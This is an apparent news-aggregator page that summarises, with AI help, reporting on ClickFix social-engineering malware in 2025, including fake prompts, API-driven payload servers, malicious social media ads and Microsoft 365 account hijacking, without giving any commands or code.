← All stories
● Covered by 3 sources Β· 3 reportsMedium impact

ClickFix Malware Exploits Rise in 2025, Leveraging API and Social Media Ads

πŸ”„ Updated 3h ago β€” new reporting from BleepingComputer, 9to5Mac
Aggregated by BrevFeed security Β· updated 4h ago
πŸ”– Save

ClickFix has become a major method of malware delivery in 2025, utilizing deceptive techniques like fake prompts and API-driven servers. Researchers found these attacks often evade detection by exploiting user habits and leveraging social media ads to spread malware disguised as legitimate applications. This growing method underscores the importance of enhancing security awareness and defenses against social engineering tactics.

Key points

Overview of ClickFix Attacks

ClickFix is a social engineering attack method exploiting user habits, such as clicking through fake prompts. It tricks users into executing malicious commands, often without triggering traditional security measures.

Recent research by Bert-Jan Pals analyzed 3,000 ClickFix payloads, revealing API-driven servers distributing the malware, making detection more challenging.

Exploiting User Habits and Deceptive Prompts

These attacks work by exploiting ingrained user habits, such as interacting with CAPTCHAs or cookie prompts. Users inadvertently execute malicious code following seemingly benign instructions.

Microsoft's 2025 Digital Defense Report shows ClickFix was involved in 47% of initial-access cases, highlighting its widespread use.

Social Media's Role in Malware Spread

According to Jamf Threat Labs, a social media ad for a fake app led users to a malicious domain. This ad perpetuated a ClickFix-style attack, installing malware by disguising itself as a legitimate app.

The attack showcased the role of social media in propagating malware, further complicating efforts to protect users.

Security Implications and Future Concerns

The rise of ClickFix emphasizes the need for enhanced security measures and awareness. By evading conventional security tools, these attacks underscore the importance of updated defenses against evolving social engineering tactics.

✨ This summary was generated by AI from the outlets' reporting listed below. It is not independently verified and may contain errors β€” check the original sources. How BrevFeed works β†’

How outlets covered it

Jamf Threat Labs reported a ClickFix-style attack using a sponsored ad on X that led to malware. The ad, masquerading as the legitimate app DynamicLake, redirected users to a malicious domain that prompted Terminal code input to install malware.

Attackers can hijack Microsoft 365 accounts in seconds using ClickFix and ConsentFix techniques. These methods exploit user habits with deceptive prompts and OAuth consent flows, allowing unauthorized access without traditional security interactions.

Research by Bert-Jan Pals details a new API-driven method for delivering malware via ClickFix, utilizing on-demand backend servers. This advancement allows attackers to distribute tailored malicious payloads that evade traditional detection methods, heightening security concerns for users and organizations.